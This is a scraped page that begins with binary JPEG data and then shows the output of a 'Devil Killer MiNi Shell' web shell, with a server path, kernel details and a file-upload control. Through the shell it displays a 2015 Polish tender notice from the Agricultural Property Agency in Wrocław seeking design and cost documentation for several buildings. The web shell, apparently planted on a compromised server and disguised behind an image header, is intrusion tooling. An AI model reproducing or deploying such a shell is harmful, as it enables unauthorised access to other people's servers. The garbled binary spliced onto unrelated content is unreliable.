JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150908/132553-N-2015.html

<p class="kh_header"><b>Wrocław: Wykonanie dokumentacji projektowo-kosztorysowej</b><br>
<b>Numer ogłoszenia: 132553 - 2015; data zamieszczenia: 08.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 71 356 39 19, faks 71 357 90 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej 
Zamówienie podzielono na 8 odrębnych przedmiotów zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania robót objętych zamówieniem Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada niezbędną wiedzę i doświadczenie. Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia, i wykształcenia niezbędnych dla wykonania zamówienia, 
a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyć 
w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. uprawnienia do projektowania w branży architektonicznej lub konstrukcyjno - budowlanej wraz z oświadczeniem o posiadaniu ważnego zaświadczenie o przynależności do izby zawodowej - wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - Termin płatności faktury - 7</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:
1.   Zmiana terminu realizacji przedmiotu umowy 
a)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, tj. wstrzymanie realizacji przedmiotu umowy przez Zamawiającego,
b)	zmiany będące następstwem działania organów administracji w szczególności przekroczenie określonych przez prawo terminów wydania przez organy administracji decyzji zezwoleń itp.,
c)	zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego.
W przypadkach określonych w § 16 ust. 1, Zamawiający będzie miał prawo do wyznaczenia nowego 
terminu realizacji umowy odpowiedniego do zaistniałych okoliczności.
2.   Zmiany Osobowe 
a)	zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami o których mowa w ustawie Prawo budowlane lub innych uprawnieniach,
b)	zmiana koordynatora lub osób odpowiedzialnych za nadzór nad prawidłowym wykonywaniem zamówienia po stronie Zamawiającego.
3.   Pozostałe Zmiany;
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego, umowy, zmiana adresu, itp.),
4.	Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, ul. Mińska 60, 54-610 Wrocław, pokój 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2015 godzina 10:15, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, ul. Mińska 60, 54-610 Wrocław, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane                       z usunięciem występujących nieprawidłowości w budynku inwentarskim z częścią mieszkalną w zespole folwarcznym  w Stoszowicach położonym na terenie dz. nr 328/2 gm. Stoszowice w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z uzyskaniem pozwolenia na budowę i pełnieniem funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynku inwentarskim z częścią mieszkalną w zespole folwarcznym  w Stoszowicach położonym na terenie dz. nr 328/2 gm. Stoszowice w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z uzyskaniem pozwolenia na budowę i pełnieniem funkcji nadzoru autorskiego.  
Zakres opracowania obejmuje projekt  budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski,, uzyskanie pozwolenia Wojewódzkiego Konserwatora Zabytków, niezbędnych opinii, uzgodnień, map, uzyskanie pozwolenia na budowę oraz pełnienie nadzoru autorskiego.
Budynek inwentarski z częścią mieszkalną w zespole folwarcznym w Stoszowicach, gm. Stoszowice dz. nr 328/2. 
- zabezpieczenie pionowe pęknięć ścian w narożniku południowo- wschodnim budynku przed dalszym odspajaniem poprzez trwałe zespolenie narożnika z resztą budynku 
- zabezpieczenie ściany szczytowo-południowej przed dalszym odspajaniem się od reszty budynku poprzez jej trwałe zespolenie z resztą budynku, w tym naprawę stabilności posadowienia belek stropowych i płatwi w gniazdach 
- zabezpieczenie kominów ponad dachem przed samoczynnym zawaleniem
- zabezpieczenie połaci dachu jednospadowego przybudówki północnej przed samoczynnym zawaleniem poprzez stabilne posadowienie krokwi w gniazdach ściany północnej budynku głównego
-uzupełnienie ubytków ścian konstrukcyjnych w przybudówce północnej 
- uzupełnienie i udrożnienie rynien i rur spustowych 
- zabezpieczenie otworów okiennych nieposiadających stolarki przed negatywnym wpływem czynników atmosferycznych 
Budynek jest nieużytkowany. Dostęp do wnętrza budynków w celu wykonania oględzin, ma być wykonany przez zleceniobiorcę własnym staraniem i na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane                       z usunięciem występujących nieprawidłowości w budynku dworze w Rudnicy położonym na terenie dz. nr 299/2 gm. Stoszowice w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z uzyskaniem pozwolenia na budowę i pełnieniem funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynku dworze w Rudnicy położonym na terenie dz. nr 299/2 gm. Stoszowice w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z uzyskaniem pozwolenia na budowę i pełnieniem funkcji nadzoru autorskiego  
Zakres opracowania obejmuje projekt  budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski,, uzyskanie pozwolenia Wojewódzkiego Konserwatora Zabytków, niezbędnych opinii, uzgodnień, map, uzyskanie pozwolenia na budowę oraz pełnienie nadzoru autorskiego.

- zabezpieczenie nadproży okiennych i murów poprzez naprawę istniejących pęknięć nadproży i luźnych fragmentów murów przed samoczynnym zawaleniem 
Budynek jest nieużytkowany. Dostęp do wnętrza budynków w celu wykonania oględzin, ma być wykonany przez zleceniobiorcę własnym staraniem i na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane                       z usunięciem występujących nieprawidłowości w budynku dworze  w Pietrzykowie położonym na terenie dz. nr 149/15 gm. Dobromierz w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z uzyskaniem pozwolenia na budowę i pełnieniem funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynku dworze  w Pietrzykowie położonym na terenie dz. nr 149/15 gm. Dobromierz w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z uzyskaniem pozwolenia na budowę i pełnieniem funkcji nadzoru autorskiego  
Zakres opracowania obejmuje projekt  budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski,, uzyskanie pozwolenia Wojewódzkiego Konserwatora Zabytków, niezbędnych opinii, uzgodnień, map, uzyskanie pozwolenia na budowę oraz pełnienie nadzoru autorskiego
-wykonanie naprawy pokrycia dachowego poprzez jego uszczelnienie (uzupełnienie brakujących dachówek)
- wykonanie uzupełnienia brakujących fragmentów rynien i rur spustowych, uszczelnienie rynien i rur spustowych oraz oczyszczenie ich z samosiewów 
Budynek jest mieszkalny, użytkowany. Dostęp do wnętrza budynków w celu wykonania oględzin, ma być wykonany przez zleceniobiorcę własnym staraniem i na własny koszt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowo - kosztorysowej na przebudowę, ze zmianą sposobu użytkowania budynku gospodarczego dobudowanego do budynku mieszkalnego nr 42E oraz lokalu biurowego zlokalizowanego w budynku mieszkalnym  nr 42E w miejscowości Bełcz Wielki, dz. nr 285/15, gmina Niechlów wraz z uzyskaniem pozwolenia na budowę i pełnienie funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej na przebudowę, ze zmianą sposobu użytkowania budynku gospodarczego dobudowanego do budynku mieszkalnego nr 42E oraz lokalu biurowego zlokalizowanego w budynku mieszkalnym  nr 42E w miejscowości Bełcz Wielki, dz. nr 285/15, gmina Niechlów.  
  Zakres prac: Przebudowa ze zmianą sposobu użytkowania nieużytkowych pomieszczeń budynku gospodarczego  na lokale mieszkalne, minimum 4 lokale oraz przebudowa ze zmianą sposobu użytkowania pomieszczeń biurowych na jeden lokal mieszkalny, wraz z wystąpieniem z odpowiednimi wnioskami i wykonaniem wszystkich niezbędnych przyłączy, wykonaniem projektu zbiornika bezodpływowego o odpowiedniej pojemności, instalacji wodno-kanalizacyjnej, instalacji centralnego ogrzewania i instalacji elektrycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji projektowo - kosztorysowej na remont lokalu mieszkalnego (pustostanu) nr 6 przy ul. Osobowickiej 112c we Wrocławiu, dz. nr 37/11, gmina Wrocław  wraz z uzyskaniem pozwolenia na budowę i pełnienie funkcji nadzoru autorskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej na remont lokalu mieszkalnego (pustostanu) nr 6 przy ul. Osobowickiej 112c we Wrocławiu, dz. nr 37/11, gmina Wrocław. Zakres prac: remont kapitalny lokalu wraz z wszystkimi niezbędnymi przyłączami, wykonanie instalacji wodno-kanalizacyjnej, instalacji centralnego ogrzewania i instalacji elektrycznej. Uzyskanie stosownych uzgodnień, pozwoleń, warunków oraz  uchwał wspólnoty mieszkaniowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 93</li>
<li>2. Termin płatności faktury - 7</li>
</ul>
</li>
</ul><br>
